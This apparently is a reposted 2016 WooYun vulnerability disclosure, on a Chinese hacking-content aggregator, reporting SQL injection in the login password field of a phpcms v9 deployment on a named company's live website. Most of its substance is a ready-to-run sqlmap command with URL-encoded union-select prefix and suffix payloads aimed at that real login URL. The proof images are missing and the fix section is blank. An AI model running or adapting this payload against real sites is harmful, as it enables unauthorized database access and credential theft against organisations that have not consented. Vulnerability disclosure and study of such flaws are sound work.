记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

网康科技主站存在SQL注入

2016-02-08 18:25

网康科技主站有用phpcms v9 ,根据网上流传的注入poc进行了测试:

http://www.netentsec.com/index.php?m=member&c=index&a=login

登录处的password为注入点,模拟登录抓取数据包,拿去sqlmap跑。



python sqlmap.py -r C:\Users\test\Desktop\相关文件\1223.txt --prefix "test%26username%3d%2527%2bunion%2bselect%2b%25274%2527%252c%2527test%255c%2527%252c" --suffix "%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523"





1 (2).jpg





2.png



漏洞证明:

3.jpg

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2016-0164106

阅读:95090 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“网康科技主站存在SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云